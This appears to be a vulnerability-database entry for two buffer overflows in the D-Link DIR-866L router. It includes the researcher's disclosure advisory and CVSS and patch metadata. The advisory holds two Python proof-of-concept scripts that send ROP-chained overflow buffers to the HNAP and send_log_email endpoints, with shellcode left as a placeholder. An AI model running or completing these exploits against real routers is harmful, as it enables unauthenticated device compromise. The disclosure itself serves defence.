VAR-201507-0645
Vulnerability from variot - Updated: 2026-04-11 00:04D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities Vendors contacted: William Brown william.brown@dlink.com, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
Details
HNAP buffer overflow
import socket import struct import string import sys
BUFFER_SIZE = 2048
Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address buf+="\x2A\xBF\xB9\xF4" #s1 useless buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address buf+="DDDD" #s3 buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2 buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
Bad chars \x00 - \x20
sleep address 2ac14c30
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data
Send email buffer overflow
import socket import struct import string import sys
BUFFER_SIZE = 2048
Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" buf+="1111" #s0 Loaded argument in S0 which is loaded in a0 buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30 buf+="XXXX" buf+="FFFF" # s3 buf+="XXXX" buf+="BBBB" # s5 buf+="CCCC" # s6 buf+="DDDD" # s7 buf+="DDDD" # extra pad buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1 buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="XXXX" # buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data
Report Timeline
- April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
- July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
- Nov 13, 2015: A public advisory is sent to security mailing lists.
Credit
This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ethernet broadband router",
"scope": null,
"trust": 1.2,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"credits": {
"_id": null,
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "134372"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.3
},
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05077",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05076",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"description": {
"_id": null,
"data": "D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. \nA buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information\n\nTitle: DIR-866L Buffer overflows in HNAP and send email functionalities \nVendors contacted: William Brown \u003cwilliam.brown@dlink.com\u003e, Patrick Cline patrick.cline@dlink.com(Dlink)\nCVE: None\n\nNote: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, \nhttp://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061\n\nHowever, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. \n\n## Product Description\n\nDIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices. \n\n## Vulnerabilities Summary\n\nHave come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF. \n\n## Details\n\nHNAP buffer overflow\n----------------------------------------------------------------------------------------------------------------------\nimport socket\nimport struct\nimport string\nimport sys\n\nBUFFER_SIZE = 2048\n\n# Observe this in a emulator/debugger or real device/debugger\n\n\nbuf = \"POST /hnap.cgi HTTP/1.1\\r\\nHOST: 10.0.0.90\\r\\nUser-Agent: test\\r\\nContent-Length: 13\\r\\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\\r\\nHNAP_AUTH: test\\r\\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\nbuf+=\"FFFF\"\nbuf+=struct.pack(\"\u003eI\",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address\nbuf+=\"\\x2A\\xBF\\xB9\\xF4\" #s1 useless\nbuf+=struct.pack(\"\u003eI\",0x2ac14c30) # s2 Sleep address\nbuf+=\"DDDD\" #s3\nbuf+=struct.pack(\"\u003eI\",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC\nbuf+=struct.pack(\"\u003eI\",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep \nbuf+=\"XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG\" #This is the padding as SP is added with 32 bytes in ROP 1\nbuf+=\"XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG\" # This is the padding as SP is added with 36 bytes in ROP 2\nbuf+=struct.pack(\"\u003eI\",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address\nbuf+=\"GGGGGGGGGGGGGGGG\"\nbuf+=\"AAAAAAAAAAAAAAAAAAAAA\" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x\nbuf+=\"GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\\r\\n\\r\\n\"+\"test=test\\r\\n\\r\\n\"\n\n# Bad chars \\x00 - \\x20\n# sleep address 2ac14c30\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], 80))\ns.send(buf)\ndata = s.recv(BUFFER_SIZE)\ns.close()\nprint \"received data:\", data\n\n----------------------------------------------------------------------------------------------------------------------\n\n# Send email buffer overflow\n----------------------------------------------------------------------------------------------------------------------\n\nimport socket\nimport struct\nimport string\nimport sys\n\nBUFFER_SIZE = 2048\n\n# Observe this in a emulator/debugger or real device/debugger\n\nbuf = \"GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\nbuf+=\"1111\" #s0 Loaded argument in S0 which is loaded in a0\nbuf+=struct.pack(\"\u003eI\",0x2ac14c30) #s4 Sleep address 0x2ac14c30 \nbuf+=\"XXXX\"\nbuf+=\"FFFF\" # s3\nbuf+=\"XXXX\"\nbuf+=\"BBBB\" # s5\nbuf+=\"CCCC\" # s6\nbuf+=\"DDDD\" # s7\nbuf+=\"DDDD\" # extra pad\nbuf+=struct.pack(\"\u003eI\",0x2ABE94B8) # Retn address 2ABE94B8 ROP1\nbuf+=\"EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\" # \nbuf+=\"EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\" # \nbuf+=\"XXXX\" # \nbuf+=\"BBBBBBBBBBBBBBBB\" #16 bytes before shellcode\nbuf+=\"CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\\r\\nHOST: 10.0.0.90\\r\\nUser-Agent: test\\r\\n\\r\\n\"\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], 80))\ns.send(buf)\ndata = s.recv(BUFFER_SIZE)\ns.close()\nprint \"received data:\", data\n\n----------------------------------------------------------------------------------------------------------------------\n\n## Report Timeline\n\n* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. \n* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor\n* Nov 13, 2015: A public advisory is sent to security mailing lists. \n\n## Credit\n\nThis vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
},
{
"db": "PACKETSTORM",
"id": "134372"
}
],
"trust": 2.25
},
"external_ids": {
"_id": null,
"data": [
{
"db": "BID",
"id": "76012",
"trust": 1.2
},
{
"db": "BID",
"id": "76014",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011",
"trust": 0.6
},
{
"db": "DLINK",
"id": "SAP10061",
"trust": 0.1
},
{
"db": "DLINK",
"id": "SAP10060",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134372",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134372"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"id": "VAR-201507-0645",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"last_update_date": "2026-04-11T00:04:01.946000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Patch for multiple D-Link product UPnP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/61829"
},
{
"title": "Patch for multiple D-Link product HTTP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/61827"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76012"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76014"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10060,"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10061"
},
{
"trust": 0.1,
"url": "http://purenetworks.com/hnap1/getdevicesettings\\r\\nhnap_auth:"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134372"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-05077",
"ident": null
},
{
"db": "CNVD",
"id": "CNVD-2015-05076",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "134372",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077",
"ident": null
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076",
"ident": null
},
{
"date": "2015-11-16T17:36:22",
"db": "PACKETSTORM",
"id": "134372",
"ident": null
},
{
"date": "2015-07-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010",
"ident": null
},
{
"date": "2015-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077",
"ident": null
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076",
"ident": null
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010",
"ident": null
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
},
"title": {
"_id": null,
"data": "Multiple D-Link Product UPnP Buffer Overflow Vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.